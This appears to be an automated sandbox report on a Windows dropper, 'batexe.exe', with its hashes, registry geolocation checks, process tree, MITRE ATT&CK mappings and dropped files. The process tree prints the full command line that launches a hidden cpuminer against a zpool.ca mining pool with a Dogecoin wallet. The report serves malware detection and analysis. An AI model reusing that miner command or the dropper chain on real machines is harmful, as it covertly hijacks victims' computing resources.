73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 14:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4780	b2e.exe
452	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
452	cpuminer-sse2.exe
452	cpuminer-sse2.exe
452	cpuminer-sse2.exe
452	cpuminer-sse2.exe
452	cpuminer-sse2.exe
452	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5472 wrote to memory of 4780	5472	batexe.exe	85
PID 5472 wrote to memory of 4780	5472	batexe.exe	85
PID 5472 wrote to memory of 4780	5472	batexe.exe	85
PID 4780 wrote to memory of 4204	4780	b2e.exe	86
PID 4780 wrote to memory of 4204	4780	b2e.exe	86
PID 4780 wrote to memory of 4204	4780	b2e.exe	86
PID 4204 wrote to memory of 452	4204	cmd.exe	89
PID 4204 wrote to memory of 452	4204	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5472
- C:\Users\Admin\AppData\Local\Temp\2EDB.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2EDB.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2EDB.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3A93.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4204
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2EDB.tmp\b2e.exe

Filesize
9.9MB

MD5
09715fdaaaf8c2663ac65d82cbe69a3a

SHA1
6b845cf1001ae367dd94ca6b13324fc8362cbfbf

SHA256
884180ae768c0de75e4d74b262a48fa3be23432f848bdffdb1bc41d66dbea15c

SHA512
671946fae2a387b95824a81324730473418163a3b2b086db78c3be223b1bc169856ce814b1ac1a2957aa33d797ca8dc0965578f44aa8100069e6d979282acc35

Download Submit
C:\Users\Admin\AppData\Local\Temp\2EDB.tmp\b2e.exe

Filesize
365KB

MD5
c51772c7673f18aab66be929f156582c

SHA1
02c137272b47406fc3171ef044fcd0bf9b70772e

SHA256
8113ff60ee12fe4b3675ace4e8358d59d0cafe70f38b49efd53177a9ff909bd3

SHA512
bfe7c8db920bc112ac47d04666da9bdbea693e877c9f6f445e60722a6a012795421a5164266591e7f99f20a3fb5fbdcc719accb28415cfd356f1f3dc7ffb7c98

Download Submit
C:\Users\Admin\AppData\Local\Temp\2EDB.tmp\b2e.exe

Filesize
192KB

MD5
6ac4b534a8945150025756c2f85dd2d4

SHA1
4f8633cd78b9248d5885e75ff1b26ef27a196ad1

SHA256
2e07e008a86c33e31905b1f49b18245261ad08ed3463c6750d63502e1e20e43d

SHA512
303f0cd104441235da58583af1597994df43d0a2d55d6245e89fc7d8f2509915525925277636214722e922f2939c93ba95627d54a18105d6cfa8e606b2f3c172

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A93.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
3c3c80c620d3fa8725702310d9ceeada

SHA1
138a11be4d6cf642622a0cb60ee971c4e0440a25

SHA256
0e44496cdfe8fadef08980be2c1185bc63956207113b68998f59ceace7c749ca

SHA512
d5f87c217a4ae6d8ed3d0eccbfe692ed40ae72905aca06ad0c9a11054f20188adc970975cc03b97fdaea99e07447187a0f6904c6087eceb1d9ce28227e775b35

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.4MB

MD5
ee32920380223188c29a420f59e570eb

SHA1
93251d72c4dac0e416a8a3d5a8e890790b5fe275

SHA256
c9d4b4c0a6e260d4941938879d39d0e5ab8fb6b97234f7ce545d61bf1397742a

SHA512
db11358f065ea5aa40792171997ce7c27043d466d10e25b7c3349c38aa052df779ee6e60dcb2f60e0691405dbdf0228528dac5141789b8be0235533ac4727e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
768KB

MD5
e3f15c79f945604229fa814f57c79274

SHA1
19a7015dfbe622ab86c48693ee1605b26112a3fa

SHA256
7b09ee53447ccf77a0f2d7bfe25908f963d681433d3cba5a16c7f45646c42175

SHA512
12dc1df8a947caee13a12eca5a976feffd7408402b0495e4971d4bd7181e8d353ebc17da044d2ce6d1c273bb05a0ca5ddf7492394b355786d8b14b0997de162c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
192KB

MD5
8c933a591c8d0c1fec1da393587d09c9

SHA1
65f4672c0e0a6a20436fbaba57dac8c1a5fc5e51

SHA256
c22ca427c0e65a0bb3e011afeba5244dd5a6e9c0327cfc7d15c4875083206b10

SHA512
96b84267fd9b7c5587c74e30d5f647acabbf6b09feac19784de4e046619fcae78f2e6aa98eb7f06fe13197bfd9207b9044b09d5248480421ceb23cb01d511881

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
410KB

MD5
a062bbe8d128f21a90339a7875f9f635

SHA1
2f768b6de0b4c52f601a37552e7b7083e8e90041

SHA256
86a02049d303a7b1a15db38706e8f5e4e6f996e221f3da27fc582521fe655aee

SHA512
c3bb6a381d1d0e6116643fbb67b910fef278b31c2007b7fefcca6bff5d3fdc762483b99e3be373ea0edefd46f2f1aaeb4e8ea4434483296ff3e1ade12f475ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
800KB

MD5
31f0eb0d9e5efabd15334a38a40faabd

SHA1
8479700e2e7efcf38e59506eb1dea83dbdd003ee

SHA256
a05b7673f1016c057674f4aec5dd8bad2e7d324792df83dd8f914d94a2762278

SHA512
c9d8f02a1bd39a10150561f23cc09e76f72a365ea9e55ace3133151474e9d327cee2ff4edde91d9c035d6adc1b932ffbde507b865991bb3230722925b5815267

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
141KB

MD5
02b2d91b7a361e719fef65ebd0a92530

SHA1
76ee66cad616e828b2c6afef8c1d416e65f5bfee

SHA256
2ede90ab6879185785a0e360457f7b24968d493c273b03343f0a06f4ad5955ae

SHA512
bb60f17152cc6c5607c7c6b6baab810f8ac3549bb488a9c677cfa953051bc8d5c95dc285926421b0d769b5a9dc8b573aed89b7307ae1fc4516e181ddb9d77d61

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
5bd9e857d8171824075a76fdba424bdf

SHA1
47c0edcb08a7e43fac436e2997bd7eec215a3164

SHA256
c98827043083dbf283c2f530762bbafe5a7f2db0fe5e2fc9d0988960edf53a48

SHA512
30c6512c3af96453e9dec6eb0abef2d1d2ae2801d1c2afb2143fdf0321f80caf6cc0f77afbfe3ba44289ed41a50beda0fbd2a6744b01117e0df909ce3fd4860e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
c80f7d95bba76c741d19987c2d4b894f

SHA1
e7a4c7e2534d0d767a9e5400ad22a14e9992f31a

SHA256
497d5dbc00369f45304612eb705fa50fa01c31014051dfd882878048c37edb54

SHA512
959a5c679b959695a327aa6f863ca4d697ae4401e984558dfc8000a5f5c90d4212e9fdc72450183deb044d63c505616ac026c1ff2c8bbb8c6f1fcd6f4bd7b695

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
265KB

MD5
5a37baa1e916a02a2b6dd5b1fa4bc295

SHA1
ea91e092fef8c1e3cd31d5aef11fb7168ff62b88

SHA256
3e812c8552a57f2ee140466193bb743cc2ca363f9fd33a74073f2861de9193ea

SHA512
c9301f46c1584fed61fba8290d424bbd911f5f981adadae1ccc041fec7d312a9738cf895042a6fa37a3abc3502a9c7d7cf755ea89a64ce5a25b9406d21ea8ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
225KB

MD5
667c3b8befd163d84658e78bd386c787

SHA1
3b167dfde68cb66a455f36ee34e89136bd544002

SHA256
0f1a1cfd835bbd04ca244bd22b20f4583f3f62c459572abbd5fa1cf82416983a

SHA512
00c7d4bcbfef89c3631e37bc4a4c885ee795894d237f9ec8d2021611d8a375897a0415817d38df0df3b6b8604fac37c6594c1f54dcfb29b30ca0934ffa42b5b9

Download Submit
memory/452-55-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/452-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/452-49-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/452-48-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/452-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-42-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/452-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/452-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4780-60-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4780-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download